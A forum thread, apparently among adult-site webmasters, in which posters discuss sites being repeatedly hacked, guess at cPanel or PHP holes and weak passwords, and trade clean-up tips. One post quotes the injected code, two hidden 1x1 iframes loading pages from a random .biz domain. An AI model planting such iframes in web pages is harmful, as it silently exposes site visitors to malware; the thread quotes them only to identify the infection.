|
Quote:
|
Quote:
I bet the guy behind it all, is reading this and laughing at us. |
Quote:
How about you? What happened when you removed it? |
Have you host run a rootcheck kit on your account, there may be backdoors still. Also have them to a search for that name in all your files from the command line.
|
Quote:
i'm not on webair either. |
Quote:
nothing at all no scipts etc just plan text i deleted the page and put a new one up and a few days later it was back i notice it only went on to index.html |
:Oh crap
|
Quote:
This guy/gal has it just about right. I work for a hosting provider and I've had to deal with this the past few days. Anyhow - here is a TIP: STRONG PASSWORDS it looks like your "hacker" is harvesting passwords (most likely insecure and very weak ones at that) and so far - the offending IP appears as (i've seen the same IP on 2 servers so far): 12.219.246.180 Ask your hosting provider (if you don't know how) to block all access from that IP and change ALL passwords on your system. |
looks like Naughty america has had the problem too
there my friends hot mom members area has it too now looks like its a big problem for all |
Some say its a hole in PhP itself, other say its in cpanel. in any case its = root access
|
I have like a 25 char pass for my root account. All letter, numbers and punctuation marks, mixed caps, etc...
I hope I'm safe. :P |
Quote:
|
Yeah, I know. I just updated everything as soon as I started seeing these threads in other boards a week and a half ago, so I hope I'm clear.
|
|
Woot! I was clear anyway =)
|
Seems I got hacked today..
Would like if someone could shed some light on this on how they got in.. icq 66883099 |
Quote:
http://www.securiteam.com/unixfocus/6R0030UH5W.html http://www.securiteam.com/unixfocus/6M00315H5S.html Im my case (webair hosted) it was through cpanel |
Jupiter is looking into it now.
Not sure how he got in.. Looks like he just walked right in by logging in with a password. |
I noticed this on one of the sites I had a hardlink trade with this morning. Bad news.
|
Quote:
that is what happends when your password is: From The Nectar Of The Bone Flows All That Clicks |
Quote:
|
Quote:
Let us know what Jupiter says though. |
just a qestion
do you use awstats ??? |
bump for a fucking solution. got hit again just now
|
theyve been hitting everyone lately
|
ne1? ne1?
|
Most of you probably didn't even clean your sites so they don't even need another access.
|
erased the virus and changed my password ... haven't had a problem since
|
any proofs
|
Quote:
|
still under hitting.
|
Quote:
|
<iframe src='http://fdghewrtewrtyrew.biz/adv/168/new.php' width=1 height=1></iframe>
<iframe src='http://fdghewrtewrtyrew.biz/adv/new.php?adv=168' width=1 height=1></iframe> |
Quote:
yep that's it. there's a new random char .net domain in the mix as well now :( |
Quote:
|
buuuuump just got hit AGAIN today
|
| All times are GMT -7. The time now is 08:07 AM. |
|
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc